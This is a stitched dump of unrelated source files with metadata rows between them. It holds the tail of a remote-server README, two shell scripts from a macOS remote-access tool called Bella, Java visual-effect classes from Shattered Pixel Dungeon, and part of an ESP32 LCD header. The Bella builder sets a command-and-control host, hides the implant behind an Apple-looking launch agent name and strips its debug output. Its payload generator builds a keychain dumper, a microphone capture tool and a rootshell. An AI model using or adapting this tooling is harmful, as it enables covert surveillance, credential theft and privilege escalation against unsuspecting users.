7. Allowing multiple messages to be sent at once without the client prompting for more input (great for commands like ping, tree, and other commands with live updates).
For full information on the pre-programmed functions, run the `manual` command when connected to the server.
--
| 8,057 | README | md | en | markdown | text | {"qsc_doc_frac_chars_curly_bracket": 0.0, "qsc_doc_frac_words_redpajama_stop": 0.30586187, "qsc_doc_num_sentences": 150.0, "qsc_doc_num_words": 1309, "qsc_doc_num_chars": 8057.0, "qsc_doc_num_lines": 147.0, "qsc_doc_mean_word_length": 4.75477464, "qsc_doc_frac_words_full_bracket": 0.0, "qsc_doc_frac_lines_end_with_readmore": 0.0, "qsc_doc_frac_lines_start_with_bullet": 0.0, "qsc_doc_frac_words_unique": 0.39266616, "qsc_doc_entropy_unigram": 5.62577877, "qsc_doc_frac_words_all_caps": 0.02379571, "qsc_doc_frac_lines_dupe_lines": 0.0, "qsc_doc_frac_chars_dupe_lines": 0.0, "qsc_doc_frac_chars_top_2grams": 0.00642674, "qsc_doc_frac_chars_top_3grams": 0.01124679, "qsc_doc_frac_chars_top_4grams": 0.00835476, "qsc_doc_frac_chars_dupe_5grams": 0.01028278, "qsc_doc_frac_chars_dupe_6grams": 0.0, "qsc_doc_frac_chars_dupe_7grams": 0.0, "qsc_doc_frac_chars_dupe_8grams": 0.0, "qsc_doc_frac_chars_dupe_9grams": 0.0, "qsc_doc_frac_chars_dupe_10grams": 0.0, "qsc_doc_frac_chars_replacement_symbols": 0.0, "qsc_doc_cate_code_related_file_name": 1.0, "qsc_doc_num_chars_sentence_length_mean": 26.04026846, "qsc_doc_frac_chars_hyperlink_html_tag": 0.0, "qsc_doc_frac_chars_alphabet": 0.91221544, "qsc_doc_frac_chars_digital": 0.01353965, "qsc_doc_frac_chars_whitespace": 0.16581854, "qsc_doc_frac_chars_hex_words": 0.0} | 1 | {"qsc_doc_frac_chars_replacement_symbols": 0, "qsc_doc_entropy_unigram": 0, "qsc_doc_frac_chars_top_2grams": 0, "qsc_doc_frac_chars_top_3grams": 0, "qsc_doc_frac_chars_top_4grams": 0, "qsc_doc_frac_chars_dupe_5grams": 0, "qsc_doc_frac_chars_dupe_6grams": 0, "qsc_doc_frac_chars_dupe_7grams": 0, "qsc_doc_frac_chars_dupe_8grams": 0, "qsc_doc_frac_chars_dupe_9grams": 0, "qsc_doc_frac_chars_dupe_10grams": 0, "qsc_doc_frac_chars_dupe_lines": 0, "qsc_doc_frac_lines_dupe_lines": 0, "qsc_doc_frac_lines_end_with_readmore": 0, "qsc_doc_frac_lines_start_with_bullet": 0, "qsc_doc_frac_words_all_caps": 0, "qsc_doc_mean_word_length": 0, "qsc_doc_num_chars": 0, "qsc_doc_num_lines": 0, "qsc_doc_num_sentences": 0, "qsc_doc_num_words": 0, "qsc_doc_frac_chars_hex_words": 0, "qsc_doc_frac_chars_hyperlink_html_tag": 0, "qsc_doc_frac_chars_alphabet": 0, "qsc_doc_frac_chars_digital": 0, "qsc_doc_frac_chars_whitespace": 0} |
00xglitch/Bella | BUILDER | #!/usr/bin/env bash
if [ $# -eq 0 ]; then
printf "Please specify a bella server.\nUSAGE: ./BUILDER 'Bella.py'\n"
exit 1
fi
bella=$1
bellaNoExt=${bella%.*}
BuildsPath=Builds/$(date '+%m-%d@%H_%M')
os=${OSTYPE//[0-9.]/}
RED="\033[1;31m"
GREEN="\033[1;32m"
BLUE="\033[1;34m"
YELLOW="\033[1;33m"
RESET="\033[00m"
export C_INCLUDE_PATH=/System/Library/Frameworks/Python.framework/Headers
mkdir -p $BuildsPath
cp $bella $BuildsPath/bella.py
read -p "What should the Launch Agent named? Default is [com.apple.Bella]: " launchagent
if [[ -z "$launchagent" ]]; then
launchagent='com.apple.Bella'
fi
read -p "Where should Bella be stored in ~/Library/? Default is [Containers/.bella]: " helperLoc
if [[ -z "$helperLoc" ]]; then
helperLoc='Containers/.bella'
fi
read -p "Where should Bella connect to: " host
if [[ -z "$host" ]]; then
echo -e '${RED}You need to enter a command and control center IP address / Domain.${RESET}'
exit 1
fi
read -p "What port should Bella connect on [Default is 4545]: " port
if [[ -z "$port" ]]; then
port=8443
fi
echo -e ${BLUE}'Configuring your Bella installation'${RESET}
if [[ $os == 'darwin' ]]; then
sed -i '' -e "s@com.apple.Bella@$launchagent@" $BuildsPath/bella.py
sed -i '' -e "s@Containers/.bella@$helperLoc@" $BuildsPath/bella.py
sed -i '' -e "s@4545@$port@" $BuildsPath/bella.py
sed -i '' -e "s@127.0.0.1@$host@" $BuildsPath/bella.py
sed -i '' -e "s@\(^[[:space:]]*\)\(print.*$\)@@g" $BuildsPath/bella.py
sed -i '' -e "s@development = True@development = False@" $BuildsPath/bella.py
elif [[ $os == 'linux-gnu' ]]; then
sed -i "s@com.apple.Bella@$launchagent@" $BuildsPath/bella.py
sed -i "s@Containers/.bella@$helperLoc@" $BuildsPath/bella.py
sed -i "s@4545@$port@" $BuildsPath/bella.py
sed -i "s@127.0.0.1@$host@" $BuildsPath/bella.py
sed -i "s@\(^[[:space:]]*\)\(print.*$\)@@g" $BuildsPath/bella.py
sed -i "s@development = True@development = False@" $BuildsPath/bella.py
else
echo -e ${RED}'Error: OS Unsupported'${RESET}
exit 1
fi
if [ $? -eq 0 ]
then
echo -e ${GREEN}'Done!'${RESET}
else
echo -e ${RED}'Error inserting config variables!'${RESET}
exit 1
fi
echo -e ${BLUE}'Preparing Python code'${RESET}
mv $BuildsPath/bella.py $BuildsPath/$bellaNoExt
echo -e ${GREEN}'Done!'${RESET}
echo -e ${YELLOW}'Built Bella is in' $BuildsPath ${RESET}
rm $BuildsPath/$bellaNoExt.c $BuildsPath/bella.py* 2>/dev/null
| 2,414 | BUILDER | en | unknown | unknown | {} | 0 | {} | |
00xglitch/Bella | Payloads/payload_generator | echo 'Generating payloads!'
base64 vnc > payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated VNC payload.\033[0m'
else
echo -e '\033[91mError creating VNC payload.\033[0m'
echo 'NONE' > payloads.txt
fi
curl https://raw.githubusercontent.com/juuso/keychaindump.git
cd keychaindump
gcc keychaindump.c -o keychaindump -lcrypto
cd ..
base64 keychaindump/keychaindump >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated keychaindump payload.\033[0m'
else
echo -e '\033[91mError creating keychaindump payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
git clone https://github.com/richardkiss/speakerpipe-osx.git
cd speakerpipe-osx
make
cp speakerpipe ../
cd ..
base64 speakerpipe-osx/mikepipe >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated microphone payload.\033[0m'
else
echo -e '\033[91mError creating microphone payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
gcc UID.c -o rootshell
base64 rootshell >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated rootshell payload.\033[0m'
else
echo -e '\033[91mError creating rootshell payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
zip -r Insomnia.zip Insomnia.kext
base64 Insomnia.zip >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated Insomnia payload.\033[0m'
else
echo -e '\033[91mError creating Insomnia payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
base64 lock_icon.png >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated Lock Icon payload.\033[0m'
else
echo -e '\033[91mError creating Lock Icon payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
base64 smallbreaker.py >> payloads.txt
if [ $? -eq 0 ]
then
echo -e '\033[93mCreated Chainbreaker payload.\033[0m'
else
echo -e '\033[91mError creating Chainbreaker payload.\033[0m'
echo 'NONE' >> payloads.txt
fi
echo 'Done!' | 1,806 | payload_generator | en | unknown | unknown | {} | 0 | {} | |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Degradation.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Group;
import com.watabou.noosa.particles.PixelParticle;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class Degradation extends Group {
private static int[] WEAPON = {
+2, -2,
+1, -1,
0, 0,
-1, +1,
-2, +2,
-2, 0,
0, +2
};
private static int[] ARMOR = {
-2, -1,
-1, -1,
+1, -1,
+2, -1,
-2, 0,
-1, 0,
0, 0,
+1, 0,
+2, 0,
-1, +1,
+1, +1,
-1, +2,
0, +2,
+1, +2
};
private static int[] RING = {
0, -1,
-1, 0,
0, 0,
+1, 0,
-1, +1,
+1, +1,
-1, +2,
0, +2,
+1, +2
};
private static int[] WAND = {
+2, -2,
+1, -1,
0, 0,
-1, +1,
-2, +2,
+1, -2,
+2, -1
};
public static Degradation weapon( PointF p ) {
return new Degradation( p, WEAPON );
}
public static Degradation armor( PointF p ) {
return new Degradation( p, ARMOR );
}
public static Degradation ring( PointF p ) {
return new Degradation( p, RING );
}
public static Degradation wand( PointF p ) {
return new Degradation( p, WAND );
}
private Degradation( PointF p, int[] matrix ) {
for (int i=0; i < matrix.length; i += 2) {
add( new Speck( p.x, p.y, matrix[i], matrix[i+1] ) );
add( new Speck( p.x, p.y, matrix[i], matrix[i+1] ) );
}
}
@Override
public void update() {
super.update();
if (countLiving() == 0) {
killAndErase();
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
public static class Speck extends PixelParticle {
private static final int COLOR = 0xFF4422;
private static final int SIZE = 3;
public Speck( float x0, float y0, int mx, int my ) {
super();
color( COLOR );
float x1 = x0 + mx * SIZE;
float y1 = y0 + my * SIZE;
PointF p = new PointF().polar( Random.Float( 2 * PointF.PI ), 8 );
x0 += p.x;
y0 += p.y;
float dx = x1 - x0;
float dy = y1 - y0;
x = x0;
y = y0;
speed.set( dx, dy );
acc.set( -dx / 4, -dy / 4 );
left = lifespan = 2f;
}
@Override
public void update() {
super.update();
am = 1 - Math.abs( left / lifespan - 0.5f ) * 2;
am *= am;
size( am * SIZE );
}
}
}
| 3,028 | Degradation | java | en | java | code | {"qsc_code_num_words": 444, "qsc_code_num_chars": 3028.0, "qsc_code_mean_word_length": 4.02252252, "qsc_code_frac_words_unique": 0.33333333, "qsc_code_frac_chars_top_2grams": 0.01903695, "qsc_code_frac_chars_top_3grams": 0.01511758, "qsc_code_frac_chars_top_4grams": 0.01343785, "qsc_code_frac_chars_dupe_5grams": 0.23236282, "qsc_code_frac_chars_dupe_6grams": 0.21780515, "qsc_code_frac_chars_dupe_7grams": 0.075028, "qsc_code_frac_chars_dupe_8grams": 0.075028, "qsc_code_frac_chars_dupe_9grams": 0.075028, "qsc_code_frac_chars_dupe_10grams": 0.075028, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.05260791, "qsc_code_frac_chars_whitespace": 0.2655218, "qsc_code_size_file_byte": 3028.0, "qsc_code_num_lines": 153.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 19.79084967, "qsc_code_frac_chars_alphabet": 0.75044964, "qsc_code_frac_chars_comments": 0.23414795, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.37837838, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00344976, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06306306, "qsc_codejava_score_lines_no_logic": 0.11711712, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/Chains.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Image;
import com.watabou.utils.Callback;
import com.watabou.utils.PointF;
public class Chains extends Group {
private static final double A = 180 / Math.PI;
private float spent = 0f;
private float duration;
private Callback callback;
private Image[] chains;
private int numChains;
private float distance;
private float rotation = 0;
private PointF from, to;
public Chains(int from, int to, Callback callback){
this(DungeonTilemap.tileCenterToWorld(from),
DungeonTilemap.tileCenterToWorld(to),
callback);
}
public Chains(PointF from, PointF to, Callback callback){
super();
this.callback = callback;
this.from = from;
this.to = to;
float dx = to.x - from.x;
float dy = to.y - from.y;
distance = (float)Math.hypot(dx, dy);
duration = distance/300f + 0.1f;
rotation = (float)(Math.atan2( dy, dx ) * A) + 90f;
numChains = Math.round(distance/6f)+1;
chains = new Image[numChains];
for (int i = 0; i < chains.length; i++){
chains[i] = new Image(Effects.get(Effects.Type.CHAIN));
chains[i].angle = rotation;
chains[i].origin.set( chains[i].width()/ 2, chains[i].height() );
add(chains[i]);
}
}
@Override
public void update() {
if ((spent += Game.elapsed) > duration) {
killAndErase();
if (callback != null) {
callback.call();
}
} else {
float dx = to.x - from.x;
float dy = to.y - from.y;
for (int i = 0; i < chains.length; i++) {
chains[i].center(new PointF(
from.x + ((dx * (i / (float)chains.length)) * (spent/duration)),
from.y + ((dy * (i / (float)chains.length)) * (spent/duration))
));
}
}
}
}
| 2,629 | Chains | java | en | java | code | {"qsc_code_num_words": 366, "qsc_code_num_chars": 2629.0, "qsc_code_mean_word_length": 4.90437158, "qsc_code_frac_words_unique": 0.41256831, "qsc_code_frac_chars_top_2grams": 0.02729805, "qsc_code_frac_chars_top_3grams": 0.04456825, "qsc_code_frac_chars_top_4grams": 0.03175487, "qsc_code_frac_chars_dupe_5grams": 0.145961, "qsc_code_frac_chars_dupe_6grams": 0.13147632, "qsc_code_frac_chars_dupe_7grams": 0.06573816, "qsc_code_frac_chars_dupe_8grams": 0.06573816, "qsc_code_frac_chars_dupe_9grams": 0.06573816, "qsc_code_frac_chars_dupe_10grams": 0.06573816, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01651723, "qsc_code_frac_chars_whitespace": 0.19399011, "qsc_code_size_file_byte": 2629.0, "qsc_code_num_lines": 101.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 26.02970297, "qsc_code_frac_chars_alphabet": 0.83058046, "qsc_code_frac_chars_comments": 0.29707113, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.1, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.01666667, "qsc_codejava_score_lines_no_logic": 0.2, "qsc_codejava_frac_words_no_modifier": 0.5, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/DarkBlock.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.noosa.Gizmo;
public class DarkBlock extends Gizmo{
private CharSprite target;
public DarkBlock( CharSprite target ) {
super();
this.target = target;
}
@Override
public void update() {
super.update();
target.brightness(0.4f);
}
public void lighten() {
target.resetColor();
killAndErase();
}
public static DarkBlock darken( CharSprite sprite ) {
DarkBlock darkBlock = new DarkBlock( sprite );
if (sprite.parent != null)
sprite.parent.add( darkBlock );
return darkBlock;
}
}
| 1,445 | DarkBlock | java | en | java | code | {"qsc_code_num_words": 190, "qsc_code_num_chars": 1445.0, "qsc_code_mean_word_length": 5.56315789, "qsc_code_frac_words_unique": 0.58947368, "qsc_code_frac_chars_top_2grams": 0.03122044, "qsc_code_frac_chars_top_3grams": 0.03689688, "qsc_code_frac_chars_top_4grams": 0.05392621, "qsc_code_frac_chars_dupe_5grams": 0.07757805, "qsc_code_frac_chars_dupe_6grams": 0.05298013, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01614274, "qsc_code_frac_chars_whitespace": 0.18546713, "qsc_code_size_file_byte": 1445.0, "qsc_code_num_lines": 60.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 24.08333333, "qsc_code_frac_chars_alphabet": 0.88190314, "qsc_code_frac_chars_comments": 0.54048443, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.12, "qsc_codejava_score_lines_no_logic": 0.32, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/ShieldHalo.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.watabou.glwrap.Blending;
import com.watabou.noosa.Game;
import com.watabou.noosa.Halo;
import com.watabou.utils.PointF;
public class ShieldHalo extends Halo {
private CharSprite target;
private float phase;
public ShieldHalo( CharSprite sprite ) {
//rectangular sprite to circular radius. Pythagorean theorem
super( (float)Math.sqrt(Math.pow(sprite.width()/2f, 2) + Math.pow(sprite.height()/2f, 2)), 0xBBAACC, 1f );
am = -0.33f;
aa = +0.33f;
target = sprite;
phase = 1;
}
@Override
public void update() {
super.update();
if (phase < 1) {
if ((phase -= Game.elapsed) <= 0) {
killAndErase();
} else {
scale.set( (2 - phase) * radius / RADIUS );
am = phase * (-1);
aa = phase * (+1);
}
}
if (visible = target.visible) {
PointF p = target.center();
point( p.x, p.y );
}
}
@Override
public void draw() {
Blending.setLightMode();
super.draw();
Blending.setNormalMode();
}
public void putOut() {
phase = 0.999f;
}
}
| 1,935 | ShieldHalo | java | en | java | code | {"qsc_code_num_words": 259, "qsc_code_num_chars": 1935.0, "qsc_code_mean_word_length": 5.0965251, "qsc_code_frac_words_unique": 0.54826255, "qsc_code_frac_chars_top_2grams": 0.03409091, "qsc_code_frac_chars_top_3grams": 0.04848485, "qsc_code_frac_chars_top_4grams": 0.04318182, "qsc_code_frac_chars_dupe_5grams": 0.06212121, "qsc_code_frac_chars_dupe_6grams": 0.04242424, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02537411, "qsc_code_frac_chars_whitespace": 0.20568475, "qsc_code_size_file_byte": 1935.0, "qsc_code_num_lines": 80.0, "qsc_code_num_chars_line_max": 109.0, "qsc_code_num_chars_line_mean": 24.1875, "qsc_code_frac_chars_alphabet": 0.83344177, "qsc_code_frac_chars_comments": 0.43410853, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04651163, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00730594, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06976744, "qsc_codejava_score_lines_no_logic": 0.25581395, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/include/iot_lcd.h | // Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
